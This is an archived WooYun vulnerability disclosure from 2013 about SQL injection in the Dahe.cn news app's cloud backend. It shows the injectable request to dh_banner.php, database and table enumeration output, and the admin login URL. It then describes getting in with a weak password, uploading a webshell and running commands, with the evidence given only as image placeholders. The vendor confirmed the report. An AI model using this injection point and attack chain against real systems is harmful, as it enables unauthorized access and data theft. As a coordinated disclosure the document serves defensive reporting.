当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-043357
漏洞标题:
大河网App云客户端1#Sql注入和Getshell
相关厂商:
大河网
漏洞作者:
zzR
提交时间:
2013-11-19 16:39
修复时间:
2014-01-03 16:40
公开时间:
2014-01-03 16:40
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-11-19: 细节已通知厂商并且等待厂商处理中
2013-11-19: 厂商已经确认,细节仅向厂商公开
2013-11-29: 细节向核心白帽子及相关领域专家公开
2013-12-09: 细节向普通白帽子公开
2013-12-19: 细节向实习白帽子公开
2014-01-03: 细节向公众公开

简要描述:

从APP到云端,发现sql注入,到后台getshell

详细说明:

APP客户端请求数据如下

GET /wp-admin/dh_banner.php?&classid=25 HTTP/1.1
Host: app.dahe.cn:90
Accept-Encoding: gzip
User-Agent: 大河网 3.0 (iPhone; iPhone OS 7.0.4; zh_CN)
Connection: close
Proxy-Connection: close"

漏洞证明:

1.png


列库

available databases [8]:
[*] app_heda
[*] dahe_news
[*] dahemob
[*] information_schema
[*] mysql
[*] news
[*] performance_schema
[*] test


users

<code>
users.png

</code>
current db库的表

Database: dahe_news
[43 tables]
+--------------------------+
| apprecommend             |
| wp_advert                |
| wp_app                   |
| wp_commentmeta           |
| wp_comments              |
| wp_district              |
| wp_em_bookings           |
| wp_em_events             |
| wp_em_locations          |
| wp_em_meta               |
| wp_em_tickets            |
| wp_em_tickets_bookings   |
| wp_favorates             |
| wp_geturl                |
| wp_iphone_push           |
| wp_links                 |
| wp_listcontent           |
| wp_message               |
| wp_options               |
| wp_phone_activity        |
| wp_phone_activity_member |
| wp_phone_activity_prize  |
| wp_phone_attachment      |
| wp_phone_pic             |
| wp_phone_pic_sort        |
| wp_postmeta              |
| wp_posts                 |
| wp_prize                 |
| wp_publishnews           |
| wp_publishtype           |
| wp_push                  |
| wp_site                  |
| wp_subject               |
| wp_subject_c             |
| wp_subject_column        |
| wp_term_relationships    |
| wp_term_taxonomy         |
| wp_terms                 |
| wp_user_like_log         |
| wp_user_point_days_log   |
| wp_user_point_rule       |
| wp_usermeta              |
| wp_users                 |
+--------------------------+


wp的后台

http://app.dahe.cn:90/wp-login.php


找个用户弱口令进去

.png


admins

admins.png


拿shell

shell.png


命令执行

com.png


修复方案:

shell已删
云端安全不容忽视

版权声明:转载请注明来源 zzR@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-11-19 16:42

厂商回复:

非常感谢,我们抓紧处理。

最新状态:

暂无